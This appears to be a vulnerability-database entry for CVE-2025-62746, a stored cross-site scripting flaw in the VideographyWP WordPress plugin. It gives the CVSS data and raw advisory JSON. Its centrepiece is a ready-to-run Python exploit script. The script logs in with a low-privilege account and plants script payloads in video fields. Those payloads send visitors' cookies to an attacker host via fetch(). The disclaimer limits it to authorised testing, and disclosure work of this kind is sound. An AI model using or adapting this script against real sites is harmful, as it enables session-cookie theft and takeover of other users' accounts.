Security Vulnerability Report
中文
CVE-2025-62746 CVSS 6.5 MEDIUM

CVE-2025-62746

Published: 2025-12-30 16:15:45
Last Modified: 2026-04-28 19:34:58
Source: [email protected]

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodeFlavors Featured Video for WordPress – VideographyWP videographywp allows Stored XSS.This issue affects Featured Video for WordPress – VideographyWP: from n/a through <= 1.0.18.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

VideographyWP (Featured Video for WordPress) <= 1.0.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys from bs4 import BeautifulSoup # CVE-2025-62746 PoC - Stored XSS in VideographyWP Plugin # Target: WordPress with Featured Video for WordPress plugin <= 1.0.18 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_account" PASSWORD = "attacker_password" def get_csrf_token(session, url): """Extract CSRF token from login page""" response = session.get(url + "/wp-login.php") soup = BeautifulSoup(response.text, 'html.parser') token = soup.find('input', {'name': '_wpnonce'}) return token['value'] if token else None def login(session): """Authenticate to WordPress with low-privilege account""" csrf_token = get_csrf_token(session, TARGET_URL) login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', '_wpnonce': csrf_token, 'redirect_to': TARGET_URL + '/wp-admin/', 'testcookie': '1' } response = session.post(TARGET_URL + '/wp-login.php', data=login_data, allow_redirects=True) return 'wordpress_logged_in' in session.cookies.get_dict() def inject_xss_payload(session): """Inject stored XSS payload via video submission form""" # XSS payload - steals cookies xss_payload = '''<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>''' # Alternative payload with event handler xss_payload_alt = '''<img src=x onerror="fetch('https://attacker.com/steal?c='+btoa(document.cookie))">''' # Get nonce for video creation admin_url = TARGET_URL + '/wp-admin/admin.php?page=videographywp-videos' response = session.get(admin_url) # Extract nonce from page (adjust selector based on actual HTML) soup = BeautifulSoup(response.text, 'html.parser') nonce_input = soup.find('input', {'name': 'nonce'}) nonce = nonce_input['value'] if nonce_input else 'YOUR_NONCE' # Prepare video data with XSS payload video_data = { 'action': 'videographywp_save_video', 'nonce': nonce, 'video_title': 'Featured Video - ' + xss_payload, 'video_description': '<script>alert("XSS")</script>', 'video_url': 'https://example.com/video.mp4' } # Submit the malicious video post_url = TARGET_URL + '/wp-admin/admin-ajax.php' response = session.post(post_url, data=video_data) return response.status_code == 200 def main(): print(f"[*] CVE-2025-62746 PoC - VideographyWP Stored XSS") print(f"[*] Target: {TARGET_URL}") session = requests.Session() session.headers.update({'User-Agent': 'Mozilla/5.0'}) print("[*] Attempting authentication...") if not login(session): print("[-] Login failed!") sys.exit(1) print("[+] Login successful!") print("[*] Injecting XSS payload...") if inject_xss_payload(session): print("[+] XSS payload injected successfully!") print("[+] Visit any page displaying the video to trigger the payload") else: print("[-] Injection failed!") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62746", "sourceIdentifier": "[email protected]", "published": "2025-12-30T16:15:45.473", "lastModified": "2026-04-28T19:34:57.873", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodeFlavors Featured Video for WordPress – VideographyWP videographywp allows Stored XSS.This issue affects Featured Video for WordPress – VideographyWP: from n/a through <= 1.0.18."}, {"lang": "es", "value": "Neutralización incorrecta de la entrada durante la generación de páginas web ('cross-site scripting') vulnerabilidad en CodeFlavors Featured Video for WordPress &amp; VideographyWP permite XSS almacenado. Este problema afecta a Featured Video for WordPress &amp; VideographyWP: desde n/a hasta 1.0.18."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/videographywp/vulnerability/wordpress-featured-video-for-wordpress-videographywp-plugin-1-0-18-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.